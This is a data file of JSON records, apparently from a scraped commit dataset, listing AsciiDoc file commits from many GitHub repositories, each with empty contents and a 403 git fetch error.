2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e109217fd98e46105966441f282aefe51e44a773","subject":"Update 2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned 
error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e5f45e57e832fb5d0f0f26ac9c0aac8bcb5a17a","subject":"change some lines","message":"change some lines\n","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2019-04-07-IPSec S2S - From Azure Stack to Mikrotik.adoc","new_file":"_posts\/2019-04-07-IPSec S2S - From Azure Stack to Mikrotik.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46200a1ecd593d2233aee61aff52e553f1b6bbda","subject":"Update 2016-03-28-asciidoc-ghpages-travis-docker.adoc","message":"Update 2016-03-28-asciidoc-ghpages-travis-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-ghpages-travis-docker.adoc","new_file":"_posts\/2016-03-28-asciidoc-ghpages-travis-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2203e86a8923684b664778e167a8f8a900d8d34","subject":"Update 2016-04-18-You-Might-Not-Need-j-Querry.adoc","message":"Update 2016-04-18-You-Might-Not-Need-j-Querry.adoc","repos":"Lukas238\/the-holodeck,Lukas238\/the-holodeck,Lukas238\/the-holodeck,Lukas238\/the-holodeck","old_file":"_posts\/2016-04-18-You-Might-Not-Need-j-Querry.adoc","new_file":"_posts\/2016-04-18-You-Might-Not-Need-j-Querry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lukas238\/the-holodeck.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a21da260b9d42fb8334984abdebb4ab9f195740","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Exercice bis.adoc","new_file":"Dev tools\/Exercice bis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f149552cc71a3259574ae27555628b50d1bbea44","subject":"Document vintage @Test (#66)","message":"Document vintage @Test (#66)\n\nDocument adaption of vintage @Test annotation (#19 \/ #66)\r\n\r\nThis feature was developed as part of JUnit Io - only the docs were\r\nmissing.\r\n","repos":"CodeFX-org\/junit-io,nicolaiparlog\/junit-pioneer","old_file":"docs\/vintage-test.adoc","new_file":"docs\/vintage-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaiparlog\/junit-pioneer.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0fa11e7df72ad7f600f938da5e4f2cb38e6429ca","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3642adaa4597bcac999f560a21f4c52d2fed31e","subject":"Update 2016-04-02-J-S-Learners-Fieldguide.adoc","message":"Update 2016-04-02-J-S-Learners-Fieldguide.adoc","repos":"metasean\/hubpress.io,metasean\/blog,metasean\/blog,metasean\/hubpress.io,metasean\/blog,metasean\/blog,metasean\/hubpress.io","old_file":"_posts\/2016-04-02-J-S-Learners-Fieldguide.adoc","new_file":"_posts\/2016-04-02-J-S-Learners-Fieldguide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metasean\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b31d260c683808733816ea25477d2808b74f26c4","subject":"Added SetBody EIP docs","message":"Added SetBody EIP docs\n","repos":"punkhorn\/camel-upstream,jonmcewen\/camel,snurmine\/camel,alvinkwekel\/camel,CodeSmell\/camel,snurmine\/camel,dmvolod\/camel,akhettar\/camel,nicolaferraro\/camel,onders86\/camel,mcollovati\/camel,onders86\/camel,anoordover\/camel,adessaigne\/camel,adessaigne\/camel,DariusX\/camel,gnodet\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,cunningt\/camel,gnodet\/camel,curso007\/camel,tdiesler\/camel,cunningt\/camel,pmoerenhout\/camel,christophd\/camel,ullgren\/camel,anoordover\/camel,gautric\/camel,anoordover\/camel,cunningt\/camel,christophd\/camel,jamesnetherton\/camel,jamesnetherton\/camel,cunningt\/camel,apache\/camel,sverkera\/camel,pax95\/camel,kevinearls\/camel,zregvart\/camel,pmoerenhout\/camel,ullgren\/camel,ullgren\/camel,gnodet\/camel,alvinkwekel\/camel,anoordover\/camel,jonmcewen\/camel,jonmcewen\/camel,mcollovati\/camel,CodeSmell\/camel,dmvolod\/camel,tdiesler\/camel,tdiesler\/camel,sverkera\/camel,onders86\/camel,christophd\/camel,gautric\/camel,kevinearls\/camel,nikhilvibhav\/camel,gautric\/camel,akhettar\/camel,alvinkwekel\/camel,DariusX\/camel,nicolaferraro\/camel,mcollovati\/camel,christophd\/camel,onders86\/camel,davidkarlsen\/camel,akhettar\/camel,cunningt\/camel,christophd\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,snurmine\/camel,nikhilvibhav\/camel,pax95\/camel,tadayosi\/camel,cunningt\/camel,jamesnetherton\/camel,gautric\/camel,apache\/camel,adessaigne\/camel,curso007\/camel,pax95\/camel,tadayosi\/camel,pmoerenhout\/camel,Fabryprog\/camel,gnodet\/camel,sverkera\/camel,DariusX\/camel,tadayosi\/camel,Fabryprog\/camel,jamesnetherton\/camel,snurmine\/camel,jonmcewen\/camel,zregvart\/camel,tadayosi\/camel,nikhilvibhav\/camel,sverkera\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,kevinearls\/camel,jonmcewen\/camel,jamesnetherton\/camel,alvinkwekel\/camel,adessaigne\/camel,davidkarlsen\/camel,pax95\/camel,kevinearls\/camel,apache\/camel,nicolaferraro\/camel,sverkera\/camel,objectiser\/camel,pax95\/camel,ullgren\/camel,gautric\/camel,onders86\/camel,anoordover\/camel,akhettar\/camel,kevinearls\/camel,jonmcewen\/camel,DariusX\/camel,apache\/camel,akhettar\/camel,dmvolod\/camel,tadayosi\/camel,dmvolod\/camel,objectiser\/camel,zregvart\/camel,adessaigne\/camel,tdiesler\/camel,pmoerenhout\/camel,curso007\/camel,curso007\/camel,Fabryprog\/camel,kevinearls\/camel,christophd\/camel,anoordover\/camel,snurmine\/camel,pmoerenhout\/camel,snurmine\/camel,apache\/camel,zregvart\/camel,pax95\/camel,nicolaferraro\/camel,gnodet\/camel,tadayosi\/camel,tdiesler\/camel,CodeSmell\/camel,dmvolod\/camel,davidkarlsen\/camel,mcollovati\/camel,Fabryprog\/camel,adessaigne\/camel,curso007\/camel,objectiser\/camel,objectiser\/camel,onders86\/camel,sverkera\/camel,akhettar\/
camel,gautric\/camel,punkhorn\/camel-upstream,curso007\/camel,dmvolod\/camel,pmoerenhout\/camel,tdiesler\/camel,apache\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/setBody-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/setBody-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09534ebcbdd0b43c0887361113e8ec2c58ad5ce0","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Component Object Model keys.asciidoc","new_file":"documentation\/Component Object Model keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9a8bacb9a8de719d78ab1cfbcfad85e6e3a5e953","subject":"Update 2016-07-15-Test.adoc","message":"Update 2016-07-15-Test.adoc","repos":"SingularityMatrix\/SingularityMatrix.github.io,SingularityMatrix\/SingularityMatrix.github.io,SingularityMatrix\/SingularityMatrix.github.io,SingularityMatrix\/SingularityMatrix.github.io","old_file":"_posts\/2016-07-15-Test.adoc","new_file":"_posts\/2016-07-15-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SingularityMatrix\/SingularityMatrix.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b97880f2ea964308164f49c7c9ac6849ffe19a7f","subject":"Update 2019-01-23-C-P-P.adoc","message":"Update 2019-01-23-C-P-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-23-C-P-P.adoc","new_file":"_posts\/2019-01-23-C-P-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49ce9e7f06c6677271d30b6b9b4e386c85d7e2f5","subject":"Add build instructions. Fixes #75","message":"Add build instructions. 
Fixes #75\n","repos":"griffon\/griffon,griffon\/griffon","old_file":"BUILDING.adoc","new_file":"BUILDING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/griffon\/griffon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2dff06ff7f217bea892e9402d4980d55d6b7d511","subject":"Update 2015-02-24-Test.adoc","message":"Update 2015-02-24-Test.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Test.adoc","new_file":"_posts\/2015-02-24-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc767b42d240ac192badd7400703737ba59aef31","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02b8b6e8feac0386cddf7124df9329c2f13b1c8a","subject":"Update 2015-01-31-First-Post.adoc","message":"Update 2015-01-31-First-Post.adoc","repos":"conchitawurst\/conchitawurst.github.io,conchitawurst\/conchitawurst.github.io,conchitawurst\/conchitawurst.github.io","old_file":"_posts\/2015-01-31-First-Post.adoc","new_file":"_posts\/2015-01-31-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/conchitawurst\/conchitawurst.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7544630ff6f71f9b749b080c420342f04b5b15d6","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2729be54d90d7571f2ddff141af9fd4632489be9","subject":"Update 2016-10-14-New-Nighttime-Holiday-Entertainment-at-Disneys-Hollywood-Studios.adoc","message":"Update 2016-10-14-New-Nighttime-Holiday-Entertainment-at-Disneys-Hollywood-Studios.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-10-14-New-Nighttime-Holiday-Entertainment-at-Disneys-Hollywood-Studios.adoc","new_file":"_posts\/2016-10-14-New-Nighttime-Holiday-Entertainment-at-Disneys-Hollywood-Studios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bdf38c537bd89c4324a94784c4c5c577ee2fe4d","subject":"Create SUMMARY.adoc","message":"Create SUMMARY.adoc","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"SUMMARY.adoc","new_file":"SUMMARY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"98174e9e51ff6f570f659b3c1d08e4cf4f841ccf","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e010c6be5dfc629dc1150f7a42d18327c10e42c","subject":"Update 2015-12-11-Da-Dom-huck.adoc","message":"Update 2015-12-11-Da-Dom-huck.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-12-11-Da-Dom-huck.adoc","new_file":"_posts\/2015-12-11-Da-Dom-huck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4be5da7c2b94f6bc9133b0932541d9cbc47704ba","subject":"Update 2015-12-09-How-to-send-analytics-from-Angular-to-Snowplow.adoc","message":"Update 2015-12-09-How-to-send-analytics-from-Angular-to-Snowplow.adoc","repos":"timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io","old_file":"_posts\/2015-12-09-How-to-send-analytics-from-Angular-to-Snowplow.adoc","new_file":"_posts\/2015-12-09-How-to-send-analytics-from-Angular-to-Snowplow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/timelf123\/timelf123.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40b0a667f6da45a3dd28e8f0cd56d90f0ee78227","subject":"y2b create post Unboxing The Samsung Galaxy S9 Clone","message":"y2b create post Unboxing The Samsung Galaxy S9 Clone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-01-Unboxing%20The%20Samsung%20Galaxy%20S9%20Clone.adoc","new_file":"_posts\/2018-02-01-Unboxing%20The%20Samsung%20Galaxy%20S9%20Clone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"61e093cf2f40bcc196b806e3af1c5c4632e7c651","subject":"Regen","message":"Regen\n","repos":"christophd\/camel,christophd\/camel,christophd\/camel,tdiesler\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,pax95\/camel,apache\/camel,adessaigne\/camel,adessaigne\/camel,cunningt\/camel,nikhilvibhav\/camel,apache\/camel,apache\/camel,pax95\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,tdiesler\/camel,pax95\/camel,adessaigne\/camel,adessaigne\/camel,tdiesler\/camel,cunningt\/camel,adessaigne\/camel,apache\/camel,christophd\/camel,tadayosi\/camel,tadayosi\/camel,tadayosi\/camel,pax95\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,christophd\/camel,tdiesler\/camel","old_file":"catalog\/camel-catalog\/src\/generated\/resources\/org\/apache\/camel\/catalog\/docs\/yaml-dsl.adoc","new_file":"catalog\/camel-catalog\/src\/generated\/resources\/org\/apache\/camel\/catalog\/docs\/yaml-dsl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8e13b683da3d81834b3b62f2c9818d21f64ed23","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dc390875ca22eb0330b8546de6057d03fde882d","subject":"Create catalog-usage.adoc","message":"Create catalog-usage.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/subscription\/includes\/catalog-usage.adoc","new_file":"userguide\/subscription\/includes\/catalog-usage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"465deed84eb3cd30cc2204887da8b902c09319fb","subject":"Update 2015-04-14-HTML-Rundown-and-Git-Beginnings.adoc","message":"Update 2015-04-14-HTML-Rundown-and-Git-Beginnings.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-04-14-HTML-Rundown-and-Git-Beginnings.adoc","new_file":"_posts\/2015-04-14-HTML-Rundown-and-Git-Beginnings.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7546cf1ec7d62df7da9fe2d6e748e3a6c40debdd","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/04\/22\/deref.adoc","new_file":"content\/news\/2022\/04\/22\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} 
{"commit":"fca4388b7b25852c5540e73057ef77677c2ef77c","subject":"Logstash 1\/3 written","message":"Logstash 1\/3 written\n\n","repos":"pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io","old_file":"_posts\/2017-07-25-Introduction-to-Logstash.adoc","new_file":"_posts\/2017-07-25-Introduction-to-Logstash.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pcu-consortium\/pcu-consortium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d5c00465c4c5146c7711c296a1946fd8dd0f875d","subject":"Update 2015-02-10-Blog-Title-2.adoc","message":"Update 2015-02-10-Blog-Title-2.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-10-Blog-Title-2.adoc","new_file":"_posts\/2015-02-10-Blog-Title-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80b6b23b62377da411b2f67cd8523c7013e647ac","subject":"Update 2017-10-19-Inyector-DLL.adoc","message":"Update 2017-10-19-Inyector-DLL.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-19-Inyector-DLL.adoc","new_file":"_posts\/2017-10-19-Inyector-DLL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed6cb5d7a056a99335fc6a430a6dd60e8f37e3a3","subject":"Worked on AMCache documentation","message":"Worked on AMCache documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/AMCache file (AMCache.hve) format.asciidoc","new_file":"documentation\/AMCache file (AMCache.hve) format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f37e0c6a1b005bafa780c309a11ab1c242588727","subject":"Fix typo regarding Ordered interface in core-aop.adoc","message":"Fix typo regarding Ordered interface in core-aop.adoc\n\nCloses gh-25759\r\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/docs\/asciidoc\/core\/core-aop.adoc","new_file":"src\/docs\/asciidoc\/core\/core-aop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29ecb0dd9286b399f30179dd212002fe96c489f0","subject":"Update 2015-02-10-Title.adoc","message":"Update 
2015-02-10-Title.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-10-Title.adoc","new_file":"_posts\/2015-02-10-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5380fd9372e882523d928cd0cb6f2bc4df1030e6","subject":"users.xml converted to users.adoc","message":"users.xml converted to users.adoc\n","repos":"aalmiray\/Json-lib,aalmiray\/Json-lib","old_file":"subprojects\/guide\/src\/docs\/asciidoc\/users.adoc","new_file":"subprojects\/guide\/src\/docs\/asciidoc\/users.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aalmiray\/Json-lib.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fee225ac8fb1d345c06c26b02b3b34f14d944e43","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dca32558a2b349f69ba729d710742f7866c0ac2","subject":"Update 2017-07-20-Alphaskades-Blog.adoc","message":"Update 2017-07-20-Alphaskades-Blog.adoc","repos":"alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io,alphaskade\/alphaskade.github.io","old_file":"_posts\/2017-07-20-Alphaskades-Blog.adoc","new_file":"_posts\/2017-07-20-Alphaskades-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alphaskade\/alphaskade.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38f1e3dc0054e5c6d14d7424732a4980f203a83a","subject":"Add README","message":"Add README\n","repos":"lukesanantonio\/inpassing-backend,lukesanantonio\/inpassing-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lukesanantonio\/inpassing-backend.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fe0a944be48f3a0b07a6838ab4789937b5a13d0","subject":"Create README.adoc","message":"Create README.adoc","repos":"ppalaga\/hawkular-ui-services,pavolloffay\/hawkular-ui-services,ppalaga\/hawkular-ui-services,hawkular\/hawkular-ui-services,ammendonca\/hawkular-ui-services,hawkular\/hawkular-ui-services,pavolloffay\/hawkular-ui-services,jpkrohling\/hawkular-ui-services,vrockai\/hawkular-ui-services,lucasponce\/hawkular-ui-services,ammendonca\/hawkular-ui-services,Jiri-Kremser\/hawkular-ui-services,vrockai\/hawkular-ui-services,jpkrohling\/hawkular-ui-services,lucasponce\/hawkular-ui-services,Jiri-Kremser\/hawkular-ui-services","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/pavolloffay\/hawkular-ui-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09d30d5e966c0c2106967859e9f8fd52a7ac414c","subject":"commit","message":"commit\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"spring\/spring-demo-tx\/readme.adoc","new_file":"spring\/spring-demo-tx\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a8edd483123f8d8b809c15fdc67cb62a6332520","subject":"Add Codacy badge","message":"Add Codacy badge","repos":"bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bindstone\/graphbank.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 